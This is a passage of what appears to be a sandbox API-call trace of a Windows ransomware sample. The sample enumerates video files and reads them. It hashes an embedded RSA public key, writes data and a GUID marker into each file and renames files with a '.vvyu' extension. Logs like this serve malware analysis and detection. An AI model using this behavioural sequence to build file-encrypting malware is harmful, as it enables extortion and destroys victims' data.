lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.173] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xf15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.173] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0196.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0196.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0196.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.174] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0196.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.175] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.175] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0196.175] CloseHandle (hObject=0x52c) returned 1 [0196.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0196.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d3a670 [0196.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0196.177] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\6cPOSY.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\6cposy.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\6cPOSY.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\6cposy.swf.vvyu")) returned 1 [0196.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.181] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0196.184] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac7c06a0, ftCreationTime.dwHighDateTime=0x1d8a065, ftLastAccessTime.dwLowDateTime=0xc8ced530, ftLastAccessTime.dwHighDateTime=0x1d8a2b8, ftLastWriteTime.dwLowDateTime=0xc8ced530, ftLastWriteTime.dwHighDateTime=0x1d8a2b8, nFileSizeHigh=0x0, nFileSizeLow=0x7e56, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7jjUxF5I.mp4", cAlternateFileName="")) returned 1 [0196.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2c70bc8 [0196.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.184] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\7jjUxF5I.mp4") returned=".mp4" [0196.185] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\7jjUxF5I.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\7jjuxf5i.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0196.185] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=32342) returned 1 [0196.185] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0196.188] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x7e30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.188] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0196.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.190] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.190] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x7e56, lpOverlapped=0x0) returned 1 [0196.191] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0196.191] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.191] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.191] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0196.192] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0196.192] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.192] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0196.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0196.193] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0196.193] GetLastError () returned 0x0 [0196.193] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0196.193] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0196.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0196.193] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0196.193] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0196.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.193] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0196.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7e60) returned 0x2d4b778 [0196.194] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0196.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0196.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0196.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cd70 [0196.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1f8 [0196.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cdb8 [0196.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a210 [0196.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a240 [0196.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2a0 [0196.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a258 [0196.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0196.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0196.195] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0196.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0196.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0196.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0196.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0196.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2a0 [0196.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0196.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a258 [0196.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0196.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a240 [0196.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0196.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0196.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0196.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0196.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0196.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0196.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0196.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0196.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0196.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0196.198] GetCurrentThreadId () returned 0x264 [0196.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0196.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d47170 [0196.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0196.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0196.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0196.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0196.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.198] GetCurrentThreadId () returned 0x264 [0196.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c03ca0 [0196.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0196.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0196.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0196.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2a0 [0196.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0196.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0196.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0196.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a240 [0196.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0196.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0196.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0196.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0196.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a258 [0196.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0196.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0196.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0196.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a228 [0196.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0196.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2b8 [0196.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0196.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a288 [0196.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a270 [0196.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2d0 [0196.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a270 [0196.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0196.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0196.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0196.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0196.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a240 [0196.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0196.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0196.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0196.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0d0a0 [0196.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0196.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0196.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0196.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0196.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0196.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0196.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0196.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0196.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0196.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0196.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0196.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.206] HeapFree (in: 